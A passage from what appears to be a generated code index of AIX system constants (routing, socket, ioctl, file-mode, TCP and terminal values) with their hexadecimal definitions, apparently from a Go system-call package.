RTA_GENMASK (line 597) | RTA_GENMASK = 0x8 constant RTA_IFA (line 598) | RTA_IFA = 0x20 constant RTA_IFP (line 599) | RTA_IFP = 0x10 constant RTA_NETMASK (line 600) | RTA_NETMASK = 0x4 constant RTC_IA64 (line 601) | RTC_IA64 = 0x3 constant RTC_POWER (line 602) | RTC_POWER = 0x1 constant RTC_POWER_PC (line 603) | RTC_POWER_PC = 0x2 constant RTF_ACTIVE_DGD (line 604) | RTF_ACTIVE_DGD = 0x1000000 constant RTF_BCE (line 605) | RTF_BCE = 0x80000 constant RTF_BLACKHOLE (line 606) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 607) | RTF_BROADCAST = 0x400000 constant RTF_BUL (line 608) | RTF_BUL = 0x2000 constant RTF_CLONE (line 609) | RTF_CLONE = 0x10000 constant RTF_CLONED (line 610) | RTF_CLONED = 0x20000 constant RTF_CLONING (line 611) | RTF_CLONING = 0x100 constant RTF_DONE (line 612) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 613) | RTF_DYNAMIC = 0x10 constant RTF_FREE_IN_PROG (line 614) | RTF_FREE_IN_PROG = 0x4000000 constant RTF_GATEWAY (line 615) | RTF_GATEWAY = 0x2 constant RTF_HOST (line 616) | RTF_HOST = 0x4 constant RTF_LLINFO (line 617) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 618) | RTF_LOCAL = 0x200000 constant RTF_MASK (line 619) | RTF_MASK = 0x80 constant RTF_MODIFIED (line 620) | RTF_MODIFIED = 0x20 constant RTF_MULTICAST (line 621) | RTF_MULTICAST = 0x800000 constant RTF_PERMANENT6 (line 622) | RTF_PERMANENT6 = 0x8000000 constant RTF_PINNED (line 623) | RTF_PINNED = 0x100000 constant RTF_PROTO1 (line 624) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 625) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 626) | RTF_PROTO3 = 0x40000 constant RTF_REJECT (line 627) | RTF_REJECT = 0x8 constant RTF_SMALLMTU (line 628) | RTF_SMALLMTU = 0x40000 constant RTF_STATIC (line 629) | RTF_STATIC = 0x800 constant RTF_STOPSRCH (line 630) | RTF_STOPSRCH = 0x2000000 constant RTF_UNREACHABLE (line 631) | RTF_UNREACHABLE = 0x10000000 constant RTF_UP (line 632) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 633) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 634) | RTM_ADD = 0x1 constant RTM_CHANGE (line 635) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 636) | RTM_DELADDR = 0xd constant RTM_DELETE (line 637) | RTM_DELETE = 0x2 constant RTM_EXPIRE (line 638) | RTM_EXPIRE = 0xf constant RTM_GET (line 639) | RTM_GET = 0x4 constant RTM_GETNEXT (line 640) | RTM_GETNEXT = 0x11 constant RTM_IFINFO (line 641) | RTM_IFINFO = 0xe constant RTM_LOCK (line 642) | RTM_LOCK = 0x8 constant RTM_LOSING (line 643) | RTM_LOSING = 0x5 constant RTM_MISS (line 644) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 645) | RTM_NEWADDR = 0xc constant RTM_OLDADD (line 646) | RTM_OLDADD = 0x9 constant RTM_OLDDEL (line 647) | RTM_OLDDEL = 0xa constant RTM_REDIRECT (line 648) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 649) | RTM_RESOLVE = 0xb constant RTM_RTLOST (line 650) | RTM_RTLOST = 0x10 constant RTM_RTTUNIT (line 651) | RTM_RTTUNIT = 0xf4240 constant RTM_SAMEADDR (line 652) | RTM_SAMEADDR = 0x12 constant RTM_SET (line 653) | RTM_SET = 0x13 constant RTM_VERSION (line 654) | RTM_VERSION = 0x2 constant RTM_VERSION_GR (line 655) | RTM_VERSION_GR = 0x4 constant RTM_VERSION_GR_COMPAT (line 656) | RTM_VERSION_GR_COMPAT = 0x3 constant RTM_VERSION_POLICY (line 657) | RTM_VERSION_POLICY = 0x5 constant RTM_VERSION_POLICY_EXT (line 658) | RTM_VERSION_POLICY_EXT = 0x6 constant RTM_VERSION_POLICY_PRFN (line 659) | RTM_VERSION_POLICY_PRFN = 0x7 constant RTV_EXPIRE (line 660) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 661) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 662) | RTV_MTU = 0x1 constant RTV_RPIPE (line 663) | RTV_RPIPE = 0x8 constant RTV_RTT (line 664) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 665) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 666) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 667) | RTV_SSTHRESH = 0x20 constant RUSAGE_CHILDREN (line 668) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 669) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 670) | RUSAGE_THREAD = 0x1 constant SCM_RIGHTS (line 671) | SCM_RIGHTS = 0x1 constant SHUT_RD (line 672) | SHUT_RD = 0x0 constant SHUT_RDWR (line 673) | SHUT_RDWR = 0x2 constant SHUT_WR (line 674) | SHUT_WR = 0x1 constant SIGMAX64 (line 675) | SIGMAX64 = 0xff constant SIGQUEUE_MAX (line 676) | SIGQUEUE_MAX = 0x20 constant SIOCADDIFVIPA (line 677) | SIOCADDIFVIPA = 0x20006942 constant SIOCADDMTU (line 678) | SIOCADDMTU = -0x7ffb9690 constant SIOCADDMULTI (line 679) | SIOCADDMULTI = -0x7fdf96cf constant SIOCADDNETID (line 680) | SIOCADDNETID = -0x7fd796a9 constant SIOCADDRT (line 681) | SIOCADDRT = -0x7fc78df6 constant SIOCAIFADDR (line 682) | SIOCAIFADDR = -0x7fbf96e6 constant SIOCATMARK (line 683) | SIOCATMARK = 0x40047307 constant SIOCDARP (line 684) | SIOCDARP = -0x7fb396e0 constant SIOCDELIFVIPA (line 685) | SIOCDELIFVIPA = 0x20006943 constant SIOCDELMTU (line 686) | SIOCDELMTU = -0x7ffb968f constant SIOCDELMULTI (line 687) | SIOCDELMULTI = -0x7fdf96ce constant SIOCDELPMTU (line 688) | SIOCDELPMTU = -0x7fd78ff6 constant SIOCDELRT (line 689) | SIOCDELRT = -0x7fc78df5 constant SIOCDIFADDR (line 690) | SIOCDIFADDR = -0x7fd796e7 constant SIOCDNETOPT (line 691) | SIOCDNETOPT = -0x3ffe9680 constant SIOCDX25XLATE (line 692) | SIOCDX25XLATE = -0x7fd7969b constant SIOCFIFADDR (line 693) | SIOCFIFADDR = -0x7fdf966d constant SIOCGARP (line 694) | SIOCGARP = -0x3fb396da constant SIOCGETMTUS (line 695) | SIOCGETMTUS = 0x2000696f constant SIOCGETSGCNT (line 696) | SIOCGETSGCNT = -0x3feb8acc constant SIOCGETVIFCNT (line 697) | SIOCGETVIFCNT = -0x3feb8acd constant SIOCGHIWAT (line 698) | SIOCGHIWAT = 0x40047301 constant SIOCGIFADDR (line 699) | SIOCGIFADDR = -0x3fd796df constant SIOCGIFADDRS (line 700) | SIOCGIFADDRS = 0x2000698c constant SIOCGIFBAUDRATE (line 701) | SIOCGIFBAUDRATE = -0x3fdf9669 constant SIOCGIFBRDADDR (line 702) | SIOCGIFBRDADDR = -0x3fd796dd constant SIOCGIFCONF (line 703) | SIOCGIFCONF = -0x3fef96bb constant SIOCGIFCONFGLOB (line 704) | SIOCGIFCONFGLOB = -0x3fef9670 constant SIOCGIFDSTADDR (line 705) | SIOCGIFDSTADDR = -0x3fd796de constant SIOCGIFFLAGS (line 706) | SIOCGIFFLAGS = -0x3fd796ef constant SIOCGIFGIDLIST (line 707) | SIOCGIFGIDLIST = 0x20006968 constant SIOCGIFHWADDR (line 708) | SIOCGIFHWADDR = -0x3fab966b constant SIOCGIFMETRIC (line 709) | SIOCGIFMETRIC = -0x3fd796e9 constant SIOCGIFMTU (line 710) | SIOCGIFMTU = -0x3fd796aa constant SIOCGIFNETMASK (line 711) | SIOCGIFNETMASK = -0x3fd796db constant SIOCGIFOPTIONS (line 712) | SIOCGIFOPTIONS = -0x3fd796d6 constant SIOCGISNO (line 713) | SIOCGISNO = -0x3fd79695 constant SIOCGLOADF (line 714) | SIOCGLOADF = -0x3ffb967e constant SIOCGLOWAT (line 715) | SIOCGLOWAT = 0x40047303 constant SIOCGNETOPT (line 716) | SIOCGNETOPT = -0x3ffe96a5 constant SIOCGNETOPT1 (line 717) | SIOCGNETOPT1 = -0x3fdf967f constant SIOCGNMTUS (line 718) | SIOCGNMTUS = 0x2000696e constant SIOCGPGRP (line 719) | SIOCGPGRP = 0x40047309 constant SIOCGSIZIFCONF (line 720) | SIOCGSIZIFCONF = 0x4004696a constant SIOCGSRCFILTER (line 721) | SIOCGSRCFILTER = -0x3fe796cb constant SIOCGTUNEPHASE (line 722) | SIOCGTUNEPHASE = -0x3ffb9676 constant SIOCGX25XLATE (line 723) | SIOCGX25XLATE = -0x3fd7969c constant SIOCIFATTACH (line 724) | SIOCIFATTACH = -0x7fdf9699 constant SIOCIFDETACH (line 725) | SIOCIFDETACH = -0x7fdf969a constant SIOCIFGETPKEY (line 726) | SIOCIFGETPKEY = -0x7fdf969b constant SIOCIF_ATM_DARP (line 727) | SIOCIF_ATM_DARP = -0x7fdf9683 constant SIOCIF_ATM_DUMPARP (line 728) | SIOCIF_ATM_DUMPARP = -0x7fdf9685 constant SIOCIF_ATM_GARP (line 729) | SIOCIF_ATM_GARP = -0x7fdf9682 constant SIOCIF_ATM_IDLE (line 730) | SIOCIF_ATM_IDLE = -0x7fdf9686 constant SIOCIF_ATM_SARP (line 731) | SIOCIF_ATM_SARP = -0x7fdf9681 constant SIOCIF_ATM_SNMPARP (line 732) | SIOCIF_ATM_SNMPARP = -0x7fdf9687 constant SIOCIF_ATM_SVC (line 733) | SIOCIF_ATM_SVC = -0x7fdf9684 constant SIOCIF_ATM_UBR (line 734) | SIOCIF_ATM_UBR = -0x7fdf9688 constant SIOCIF_DEVHEALTH (line 735) | SIOCIF_DEVHEALTH = -0x7ffb966c constant SIOCIF_IB_ARP_INCOMP (line 736) | SIOCIF_IB_ARP_INCOMP = -0x7fdf9677 constant SIOCIF_IB_ARP_TIMER (line 737) | SIOCIF_IB_ARP_TIMER = -0x7fdf9678 constant SIOCIF_IB_CLEAR_PINFO (line 738) | SIOCIF_IB_CLEAR_PINFO = -0x3fdf966f constant SIOCIF_IB_DEL_ARP (line 739) | SIOCIF_IB_DEL_ARP = -0x7fdf967f constant SIOCIF_IB_DEL_PINFO (line 740) | SIOCIF_IB_DEL_PINFO = -0x3fdf9670 constant SIOCIF_IB_DUMP_ARP (line 741) | SIOCIF_IB_DUMP_ARP = -0x7fdf9680 constant SIOCIF_IB_GET_ARP (line 742) | SIOCIF_IB_GET_ARP = -0x7fdf967e constant SIOCIF_IB_GET_INFO (line 743) | SIOCIF_IB_GET_INFO = -0x3f879675 constant SIOCIF_IB_GET_STATS (line 744) | SIOCIF_IB_GET_STATS = -0x3f879672 constant SIOCIF_IB_NOTIFY_ADDR_REM (line 745) | SIOCIF_IB_NOTIFY_ADDR_REM = -0x3f87966a constant SIOCIF_IB_RESET_STATS (line 746) | SIOCIF_IB_RESET_STATS = -0x3f879671 constant SIOCIF_IB_RESIZE_CQ (line 747) | SIOCIF_IB_RESIZE_CQ = -0x7fdf9679 constant SIOCIF_IB_SET_ARP (line 748) | SIOCIF_IB_SET_ARP = -0x7fdf967d constant SIOCIF_IB_SET_PKEY (line 749) | SIOCIF_IB_SET_PKEY = -0x7fdf967c constant SIOCIF_IB_SET_PORT (line 750) | SIOCIF_IB_SET_PORT = -0x7fdf967b constant SIOCIF_IB_SET_QKEY (line 751) | SIOCIF_IB_SET_QKEY = -0x7fdf9676 constant SIOCIF_IB_SET_QSIZE (line 752) | SIOCIF_IB_SET_QSIZE = -0x7fdf967a constant SIOCLISTIFVIPA (line 753) | SIOCLISTIFVIPA = 0x20006944 constant SIOCSARP (line 754) | SIOCSARP = -0x7fb396e2 constant SIOCSHIWAT (line 755) | SIOCSHIWAT = 0xffffffff80047300 constant SIOCSIFADDR (line 756) | SIOCSIFADDR = -0x7fd796f4 constant SIOCSIFADDRORI (line 757) | SIOCSIFADDRORI = -0x7fdb9673 constant SIOCSIFBRDADDR (line 758) | SIOCSIFBRDADDR = -0x7fd796ed constant SIOCSIFDSTADDR (line 759) | SIOCSIFDSTADDR = -0x7fd796f2 constant SIOCSIFFLAGS (line 760) | SIOCSIFFLAGS = -0x7fd796f0 constant SIOCSIFGIDLIST (line 761) | SIOCSIFGIDLIST = 0x20006969 constant SIOCSIFMETRIC (line 762) | SIOCSIFMETRIC = -0x7fd796e8 constant SIOCSIFMTU (line 763) | SIOCSIFMTU = -0x7fd796a8 constant SIOCSIFNETDUMP (line 764) | SIOCSIFNETDUMP = -0x7fd796e4 constant SIOCSIFNETMASK (line 765) | SIOCSIFNETMASK = -0x7fd796ea constant SIOCSIFOPTIONS (line 766) | SIOCSIFOPTIONS = -0x7fd796d7 constant SIOCSIFSUBCHAN (line 767) | SIOCSIFSUBCHAN = -0x7fd796e5 constant SIOCSISNO (line 768) | SIOCSISNO = -0x7fd79694 constant SIOCSLOADF (line 769) | SIOCSLOADF = -0x3ffb967d constant SIOCSLOWAT (line 770) | SIOCSLOWAT = 0xffffffff80047302 constant SIOCSNETOPT (line 771) | SIOCSNETOPT = -0x7ffe96a6 constant SIOCSPGRP (line 772) | SIOCSPGRP = 0xffffffff80047308 constant SIOCSX25XLATE (line 773) | SIOCSX25XLATE = -0x7fd7969d constant SOCK_CONN_DGRAM (line 774) | SOCK_CONN_DGRAM = 0x6 constant SOCK_DGRAM (line 775) | SOCK_DGRAM = 0x2 constant SOCK_RAW (line 776) | SOCK_RAW = 0x3 constant SOCK_RDM (line 777) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 778) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 779) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 780) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 781) | SOMAXCONN = 0x400 constant SO_ACCEPTCONN (line 782) | SO_ACCEPTCONN = 0x2 constant SO_AUDIT (line 783) | SO_AUDIT = 0x8000 constant SO_BROADCAST (line 784) | SO_BROADCAST = 0x20 constant SO_CKSUMRECV (line 785) | SO_CKSUMRECV = 0x800 constant SO_DEBUG (line 786) | SO_DEBUG = 0x1 constant SO_DONTROUTE (line 787) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 788) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 789) | SO_KEEPALIVE = 0x8 constant SO_KERNACCEPT (line 790) | SO_KERNACCEPT = 0x2000 constant SO_LINGER (line 791) | SO_LINGER = 0x80 constant SO_NOMULTIPATH (line 792) | SO_NOMULTIPATH = 0x4000 constant SO_NOREUSEADDR (line 793) | SO_NOREUSEADDR = 0x1000 constant SO_OOBINLINE (line 794) | SO_OOBINLINE = 0x100 constant SO_PEERID (line 795) | SO_PEERID = 0x1009 constant SO_RCVBUF (line 796) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 797) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 798) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 799) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 800) | SO_REUSEPORT = 0x200 constant SO_SNDBUF (line 801) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 802) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 803) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMPNS (line 804) | SO_TIMESTAMPNS = 0x100a constant SO_TYPE (line 805) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 806) | SO_USELOOPBACK = 0x40 constant SO_USE_IFBUFS (line 807) | SO_USE_IFBUFS = 0x400 constant S_BANDURG (line 808) | S_BANDURG = 0x400 constant S_EMODFMT (line 809) | S_EMODFMT = 0x3c000000 constant S_ENFMT (line 810) | S_ENFMT = 0x400 constant S_ERROR (line 811) | S_ERROR = 0x100 constant S_HANGUP (line 812) | S_HANGUP = 0x200 constant S_HIPRI (line 813) | S_HIPRI = 0x2 constant S_ICRYPTO (line 814) | S_ICRYPTO = 0x80000 constant S_IEXEC (line 815) | S_IEXEC = 0x40 constant S_IFBLK (line 816) | S_IFBLK = 0x6000 constant S_IFCHR (line 817) | S_IFCHR = 0x2000 constant S_IFDIR (line 818) | S_IFDIR = 0x4000 constant S_IFIFO (line 819) | S_IFIFO = 0x1000 constant S_IFJOURNAL (line 820) | S_IFJOURNAL = 0x10000 constant S_IFLNK (line 821) | S_IFLNK = 0xa000 constant S_IFMPX (line 822) | S_IFMPX = 0x2200 constant S_IFMT (line 823) | S_IFMT = 0xf000 constant S_IFPDIR (line 824) | S_IFPDIR = 0x4000000 constant S_IFPSDIR (line 825) | S_IFPSDIR = 0x8000000 constant S_IFPSSDIR (line 826) | S_IFPSSDIR = 0xc000000 constant S_IFREG (line 827) | S_IFREG = 0x8000 constant S_IFSOCK (line 828) | S_IFSOCK = 0xc000 constant S_IFSYSEA (line 829) | S_IFSYSEA = 0x30000000 constant S_INPUT (line 830) | S_INPUT = 0x1 constant S_IREAD (line 831) | S_IREAD = 0x100 constant S_IRGRP (line 832) | S_IRGRP = 0x20 constant S_IROTH (line 833) | S_IROTH = 0x4 constant S_IRUSR (line 834) | S_IRUSR = 0x100 constant S_IRWXG (line 835) | S_IRWXG = 0x38 constant S_IRWXO (line 836) | S_IRWXO = 0x7 constant S_IRWXU (line 837) | S_IRWXU = 0x1c0 constant S_ISGID (line 838) | S_ISGID = 0x400 constant S_ISUID (line 839) | S_ISUID = 0x800 constant S_ISVTX (line 840) | S_ISVTX = 0x200 constant S_ITCB (line 841) | S_ITCB = 0x1000000 constant S_ITP (line 842) | S_ITP = 0x800000 constant S_IWGRP (line 843) | S_IWGRP = 0x10 constant S_IWOTH (line 844) | S_IWOTH = 0x2 constant S_IWRITE (line 845) | S_IWRITE = 0x80 constant S_IWUSR (line 846) | S_IWUSR = 0x80 constant S_IXACL (line 847) | S_IXACL = 0x2000000 constant S_IXATTR (line 848) | S_IXATTR = 0x40000 constant S_IXGRP (line 849) | S_IXGRP = 0x8 constant S_IXINTERFACE (line 850) | S_IXINTERFACE = 0x100000 constant S_IXMOD (line 851) | S_IXMOD = 0x40000000 constant S_IXOTH (line 852) | S_IXOTH = 0x1 constant S_IXUSR (line 853) | S_IXUSR = 0x40 constant S_MSG (line 854) | S_MSG = 0x8 constant S_OUTPUT (line 855) | S_OUTPUT = 0x4 constant S_RDBAND (line 856) | S_RDBAND = 0x20 constant S_RDNORM (line 857) | S_RDNORM = 0x10 constant S_RESERVED1 (line 858) | S_RESERVED1 = 0x20000 constant S_RESERVED2 (line 859) | S_RESERVED2 = 0x200000 constant S_RESERVED3 (line 860) | S_RESERVED3 = 0x400000 constant S_RESERVED4 (line 861) | S_RESERVED4 = 0x80000000 constant S_RESFMT1 (line 862) | S_RESFMT1 = 0x10000000 constant S_RESFMT10 (line 863) | S_RESFMT10 = 0x34000000 constant S_RESFMT11 (line 864) | S_RESFMT11 = 0x38000000 constant S_RESFMT12 (line 865) | S_RESFMT12 = 0x3c000000 constant S_RESFMT2 (line 866) | S_RESFMT2 = 0x14000000 constant S_RESFMT3 (line 867) | S_RESFMT3 = 0x18000000 constant S_RESFMT4 (line 868) | S_RESFMT4 = 0x1c000000 constant S_RESFMT5 (line 869) | S_RESFMT5 = 0x20000000 constant S_RESFMT6 (line 870) | S_RESFMT6 = 0x24000000 constant S_RESFMT7 (line 871) | S_RESFMT7 = 0x28000000 constant S_RESFMT8 (line 872) | S_RESFMT8 = 0x2c000000 constant S_WRBAND (line 873) | S_WRBAND = 0x80 constant S_WRNORM (line 874) | S_WRNORM = 0x40 constant TAB0 (line 875) | TAB0 = 0x0 constant TAB1 (line 876) | TAB1 = 0x400 constant TAB2 (line 877) | TAB2 = 0x800 constant TAB3 (line 878) | TAB3 = 0xc00 constant TABDLY (line 879) | TABDLY = 0xc00 constant TCFLSH (line 880) | TCFLSH = 0x540c constant TCGETA (line 881) | TCGETA = 0x5405 constant TCGETS (line 882) | TCGETS = 0x5401 constant TCIFLUSH (line 883) | TCIFLUSH = 0x0 constant TCIOFF (line 884) | TCIOFF = 0x2 constant TCIOFLUSH (line 885) | TCIOFLUSH = 0x2 constant TCION (line 886) | TCION = 0x3 constant TCOFLUSH (line 887) | TCOFLUSH = 0x1 constant TCOOFF (line 888) | TCOOFF = 0x0 constant TCOON (line 889) | TCOON = 0x1 constant TCP_24DAYS_WORTH_OF_SLOWTICKS (line 890) | TCP_24DAYS_WORTH_OF_SLOWTICKS = 0x3f4800 constant TCP_ACLADD (line 891) | TCP_ACLADD = 0x23 constant TCP_ACLBIND (line 892) | TCP_ACLBIND = 0x26 constant TCP_ACLCLEAR (line 893) | TCP_ACLCLEAR = 0x22 constant TCP_ACLDEL (line 894) | TCP_ACLDEL = 0x24 constant TCP_ACLDENY (line 895) | TCP_ACLDENY = 0x8 constant TCP_ACLFLUSH (line 896) | TCP_ACLFLUSH = 0x21 constant TCP_ACLGID (line 897) | TCP_ACLGID = 0x1 constant TCP_ACLLS (line 898) | TCP_ACLLS = 0x25 constant TCP_ACLSUBNET (line 899) | TCP_ACLSUBNET = 0x4 constant TCP_ACLUID (line 900) | TCP_ACLUID = 0x2 constant TCP_CWND_DF (line 901) | TCP_CWND_DF = 0x16 constant TCP_CWND_IF (line 902) | TCP_CWND_IF = 0x15 constant TCP_DELAY_ACK_FIN (line 903) | TCP_DELAY_ACK_FIN = 0x2 constant TCP_DELAY_ACK_SYN (line 904) | TCP_DELAY_ACK_SYN = 0x1 constant TCP_FASTNAME (line 905) | TCP_FASTNAME = 0x101080a constant TCP_KEEPCNT (line 906) | TCP_KEEPCNT = 0x13 constant TCP_KEEPIDLE (line 907) | TCP_KEEPIDLE = 0x11 constant TCP_KEEPINTVL (line 908) | TCP_KEEPINTVL = 0x12 constant TCP_LSPRIV (line 909) | TCP_LSPRIV = 0x29 constant TCP_LUID (line 910) | TCP_LUID = 0x20 constant TCP_MAXBURST (line 911) | TCP_MAXBURST = 0x8 constant TCP_MAXDF (line 912) | TCP_MAXDF = 0x64 constant TCP_MAXIF (line 913) | TCP_MAXIF = 0x64 constant TCP_MAXSEG (line 914) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 915) | TCP_MAXWIN = 0xffff constant TCP_MAXWINDOWSCALE (line 916) | TCP_MAXWINDOWSCALE = 0xe constant TCP_MAX_SACK (line 917) | TCP_MAX_SACK = 0x4 constant TCP_MSS (line 918) | TCP_MSS = 0x5b4 constant TCP_NODELAY (line 919) | TCP_NODELAY = 0x1 constant TCP_NODELAYACK (line 920) | TCP_NODELAYACK = 0x14 constant TCP_NOREDUCE_CWND_EXIT_FRXMT (line 921) | TCP_NOREDUCE_CWND_EXIT_FRXMT = 0x19 constant TCP_NOREDUCE_CWND_IN_FRXMT (line 922) | TCP_NOREDUCE_CWND_IN_FRXMT = 0x18 constant TCP_NOTENTER_SSTART (line 923) | TCP_NOTENTER_SSTART = 0x17 constant TCP_OPT (line 924) | TCP_OPT = 0x19 constant TCP_RFC1323 (line 925) | TCP_RFC1323 = 0x4 constant TCP_SETPRIV (line 926) | TCP_SETPRIV = 0x27 constant TCP_STDURG (line 927) | TCP_STDURG = 0x10 constant TCP_TIMESTAMP_OPTLEN (line 928) | TCP_TIMESTAMP_OPTLEN = 0xc constant TCP_UNSETPRIV (line 929) | TCP_UNSETPRIV = 0x28 constant TCSAFLUSH (line 930) | TCSAFLUSH = 0x2 constant TCSBRK (line 931) | TCSBRK = 0x5409 constant TCSETA (line 932) | TCSETA = 0x5406 constant TCSETAF (line 933) | TCSETAF = 0x5408 constant TCSETAW (line 934) | TCSETAW = 0x5407 constant TCSETS (line 935) | TCSETS = 0x5402 constant TCSETSF (line 936) | TCSETSF = 0x5404 constant TCSETSW (line 937) | TCSETSW = 0x5403 constant TCXONC (line 938) | TCXONC = 0x540b constant TIMER_ABSTIME (line 939) | TIMER_ABSTIME = 0x3e7 constant TIMER_MAX (line 940) | TIMER_MAX = 0x20 constant TIOC (line 941) | TIOC = 0x5400 constant TIOCCBRK (line 942) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 943) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 944) | TIOCCONS = 0xffffffff80047462 constant TIOCEXCL (line 945) | TIOCEXCL = 0x2000740d constant TIOCFLUSH (line 946) | TIOCFLUSH = 0xffffffff80047410 constant TIOCGETC (line 947) | TIOCGETC = 0x40067412 constant TIOCGETD (line 948) | TIOCGETD = 0x40047400 constant TIOCGETP (line 949) | TIOCGETP = 0x40067408 constant TIOCGLTC (line 950) | TIOCGLTC = 0x40067474 constant TIOCGPGRP (line 951) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 952) | TIOCGSID = 0x40047448 constant TIOCGSIZE (line 953) | TIOCGSIZE = 0x40087468 constant TIOCGWINSZ (line 954) | TIOCGWINSZ = 0x40087468 constant TIOCHPCL (line 955) | TIOCHPCL = 0x20007402 constant TIOCLBIC (line 956) | TIOCLBIC = 0xffffffff8004747e constant TIOCLBIS (line 957) | TIOCLBIS = 0xffffffff8004747f constant TIOCLGET (line 958) | TIOCLGET = 0x4004747c constant TIOCLSET (line 959) | TIOCLSET = 0xffffffff8004747d constant TIOCMBIC (line 960) | TIOCMBIC = 0xffffffff8004746b constant TIOCMBIS (line 961) | TIOCMBIS = 0xffffffff8004746c constant TIOCMGET (line 962) | TIOCMGET = 0x4004746a constant TIOCMIWAIT (line 963) | TIOCMIWAIT = 0xffffffff80047464 constant TIOCMODG (line 964) | TIOCMODG = 0x40047403 constant TIOCMODS (line 965) | TIOCMODS = 0xffffffff80047404 constant TIOCMSET (line 966) | TIOCMSET = 0xffffffff8004746d constant TIOCM_CAR (line 967) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 968) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 969) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 970) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 971) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 972) | TIOCM_LE = 0x1 constant TIOCM_RI (line 973) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 974) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 975) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 976) | TIOCM_SR = 0x10 constant TIOCM_ST (line 977) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 978) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 979) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 980) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 981) | TIOCPKT = 0xffffffff80047470 constant TIOCPKT_DATA (line 982) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 983) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 984) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 985) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_NOSTOP (line 986) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 987) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 988) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 989) | TIOCREMOTE = 0xffffffff80047469 constant TIOCSBRK (line 990) | TIOCSBRK = 0x2000747b constant TIOCSDTR (line 991) | TIOCSDTR = 0x20007479 constant TIOCSETC (line 992) | TIOCSETC = 0xffffffff80067411 constant TIOCSETD (line 993) | TIOCSETD = 0xffffffff80047401 constant TIOCSETN (line 994) | TIOCSETN = 0xffffffff8006740a constant TIOCSETP (line 995) | TIOCSETP = 0xffffffff80067409 constant TIOCSLTC (line 996) | TIOCSLTC = 0xffffffff80067475 constant TIOCSPGRP (line 997) | TIOCSPGRP = 0xffffffff80047476 constant TIOCSSIZE (line 998) | TIOCSSIZE = 0xffffffff80087467 constant TIOCSTART (line 999) | TIOCSTART = 0x2000746e constant TIOCSTI (line 1000) | TIOCSTI = 0xffffffff80017472 constant TIOCSTOP (line 1001) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1002) | TIOCSWINSZ = 0xffffffff80087467 constant TIOCUCNTL (line 1003) | TIOCUCNTL = 0xffffffff80047466 constant TOSTOP (line 1004) | TOSTOP = 0x10000 constant UTIME_NOW (line 1005) | UTIME_NOW = -0x2 constant UTIME_OMIT (line 1006) | UTIME_OMIT = -0x3 constant VDISCRD (line 1007) | VDISCRD = 0xc constant VDSUSP (line 1008) | VDSUSP = 0xa constant VEOF (line 1009) | VEOF = 0x4 constant VEOL (line 1010) | VEOL = 0x5 constant VEOL2 (line 1011) | VEOL2 = 0x6 constant VERASE (line 1012) | VERASE = 0x2 constant VINTR (line 1013) | VINTR = 0x0 constant VKILL (line 1014) | VKILL = 0x3 constant VLNEXT (line 1015) | VLNEXT = 0xe constant VMIN (line 1016) | VMIN = 0x4 constant VQUIT (line 1017) | VQUIT = 0x1 constant VREPRINT (line 1018) | VREPRINT = 0xb constant VSTART (line 1019) | VSTART = 0x7 constant VSTOP (line 1020) | VSTOP = 0x8 constant VSTRT (line 1021) | VSTRT = 0x7 constant VSUSP (line 1022) | VSUSP = 0x9 constant VT0 (line 1023) | VT0 = 0x0 constant VT1 (line 1024) | VT1 = 0x8000 constant VTDELAY (line 1025) | VTDELAY = 0x2000 constant VTDLY (line 1026) | VTDLY = 0x8000 constant VTIME (line 1027) | VTIME = 0x5 constant VWERSE (line 1028) | VWERSE = 0xd constant WPARSTART (line 1029) 